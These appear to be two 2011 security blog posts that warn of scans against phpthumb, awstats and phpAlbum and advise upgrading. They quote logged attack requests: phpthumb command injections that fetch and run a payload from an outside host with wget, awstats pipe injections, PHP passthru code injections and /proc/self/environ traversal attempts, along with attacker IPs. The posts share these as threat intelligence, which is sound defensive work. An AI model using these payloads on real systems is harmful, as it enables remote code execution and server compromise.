22 December 2011

New attempts to exploit old phpthumb vulnerabilities

After several weeks of heavy scanning for awstats vulnerabilities that reminded us of the importance of patching followed by some scanners trying to exploit phpAlbum vulnerabilities, we now have seen thousands of attempts to exploit a phpthumb vulnerability first reported by Secunia in April 2010 as CVE-2010-1598.   (Hey, give these guys some credit… they started out using the awstats vulnerability that was first discovered in 2006… maybe we should we call this progress?)

The vulnerability text states that it is applicable to phpthumb version <= 1.7.9.  The current version is 1.7.11 and is available for download here. If you are using phpthumb, upgrade to the latest version to avoid becoming a victim.  

The requests I have seen are typically as follows:  

GET /admin/phpthumb/phpthumb.php?fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; & src=file.jpg & phpThumbDebug=9

GET /lib/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; & phpThumbDebug=9  

IPs seen today were as follows:

91.121.61.223
202.131.87.70


19 December 2011

Attacks against awstats also include attacks against phpAlbum

Following up to a post from last Friday regarding the importance of patching, I thought I would update some of the activity we are seeing from the various folks running scans for the awstats vulnerabilities previously mentioned.  It seems that in addition to looking for the various awstats vulnerabilities, the scanners have now added some searches for some vulnerabilities in phpAlbum that were disclosed on Exploit DB at the end of October. 

If you look at the requests made of main.php (below), you can see that the scanner is trying to do PHP code injection to identify vulnerable systems for later exploitation. According to the phpAlbum web site this bug has already been fixed, but I have not independently verified that information.  That being said, it would seem prudent to upgrade your version of phpAlbum. 

Since phpAlbum frequently used with Joomla installations, this is probably closely related to similar activity that Ryan Barnett pointed out recently on the Spiderlabs blog. Note that the scanner is also trying a directory traversal attempt with index.php. 

GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /apps/phpalbum/main.php?var1=1'.passthru('id').';&cmd=setquality
GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /catalog/
GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo|
GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ[[#0]]
GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ
GET /?mod=../../../../../../proc/self/environ[[#0]]
GET /phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /site.php?a={${passthru(chr(105).chr(100))}}
GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|


Some additional IPs we have seen involved in this activity are as follows: 

220.162.244.251
218.77.120.135
82.130.140.90
78.46.104.76
202.213.205.172
62.48.74.126
190.196.30.122
209.109.129.166